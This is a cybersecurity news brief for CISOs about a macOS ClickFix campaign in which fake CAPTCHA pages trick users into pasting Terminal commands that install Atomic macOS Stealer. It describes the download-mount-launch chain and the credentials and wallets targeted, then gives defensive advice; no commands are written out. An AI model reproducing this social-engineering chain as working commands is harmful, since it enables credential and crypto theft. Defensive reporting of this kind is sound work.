What happened
A new macOS ClickFix campaign is using fake CAPTCHA pages to trick users into running malicious Terminal commands that silently download, mount, and launch malware from disk image files.
Researchers at Palo Alto Networks Unit 42 found that the campaign infects Mac devices with Atomic macOS Stealer, also known as AMOS. The infostealer is designed to steal browser credentials, cryptocurrency wallet data, Apple Keychain data, messaging app information, and user documents.
The attack begins when a fake CAPTCHA page tells users to open Terminal and paste a command to verify themselves. Once executed, the command downloads a malicious DMG file from an attacker-controlled server, saves it under a random filename, mounts it using macOS’s native hdiutil utility, searches for an application or installer inside the mounted image, and launches it automatically.
This approach combines ClickFix social engineering with silent DMG execution. Previous macOS ClickFix attacks typically required users to manually open downloaded DMG files or execute scripts. In this campaign, the Terminal command handles the download, mount, search, and launch process.
The delivered payload is part of the Atomic macOS Stealer family. The malware displays a fake System Preferences authentication prompt to capture the user’s password.
The stealer targets multiple Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It also targets Firefox-derived browsers, including LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser. The stolen data can include cookies, login databases, autofill information, stored payment cards, and browser profile data.
The malware also searches for cryptocurrency wallet data, including Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper. It also steals Telegram Desktop and Discord data, Apple Notes databases, Safari cookies, Apple Keychain database files, and user documents with PDF, TXT, or RTF extensions.
All harvested data is stored in a ZIP archive and uploaded to the attacker’s server. Researchers also found that the malware can replace legitimate Ledger Live and Trezor Suite installations with malicious versions, likely to support cryptocurrency theft.
Who is affected
Mac users are affected if they encounter the fake CAPTCHA pages and follow instructions to paste commands into Terminal.
The campaign is especially dangerous for users who store browser passwords, session cookies, payment details, cryptocurrency wallet data, Apple Notes content, messaging app data, or sensitive documents on their Mac devices.
Organizations with employees using macOS devices may also be affected because the attack relies on social engineering rather than a traditional software exploit. A user who believes they are completing a CAPTCHA verification can unknowingly run a command that installs an infostealer and exfiltrates sensitive data.
Why CISOs should care
This campaign shows how ClickFix tactics are adapting to macOS. Instead of asking users to download and open a file manually, attackers are using Terminal commands that quietly download, mount, and launch malicious DMGs in one flow.
For CISOs, the key risk is that the attack bypasses many assumptions about user intent and software execution. The victim is not simply clicking a suspicious attachment. They are being socially engineered into running a command that uses native macOS utilities to complete the infection chain.
The AMOS payload also creates broad credential and data exposure. Browser credentials, cookies, payment data, Keychain files, messaging data, crypto wallets, and user documents can all support account takeover, financial theft, business email compromise, and follow-on compromise.
The fake System Preferences prompt is another concern because it turns normal macOS trust patterns against users. Once the user enters their password, the malware can capture it and use it to expand access.
3 practical actions
- Warn users never to paste Terminal commands from websites: The attack starts with a fake CAPTCHA page telling users to run a Terminal command. CISOs should train users that CAPTCHA checks, browser fixes, and troubleshooting pages should never require pasting commands into Terminal.
- Monitor macOS endpoints for suspicious DMG mounting and script activity: The campaign uses native macOS tools to download, silently mount, search, and launch malicious disk images. Security teams should alert on unusual Terminal-launched downloads, hdiutil activity, random DMG files in temporary folders, and unexpected application launches.
- Protect credentials and crypto assets from infostealer exposure: AMOS steals browser data, Keychain files, messaging app data, documents, and cryptocurrency wallet information. Organizations should enforce password managers, phishing-resistant MFA, endpoint detection on macOS, and rapid credential rotation after suspected infostealer infection.
John Kevin Hao is a news and feature writer covering cybersecurity, technology, and business targeted for professional audiences.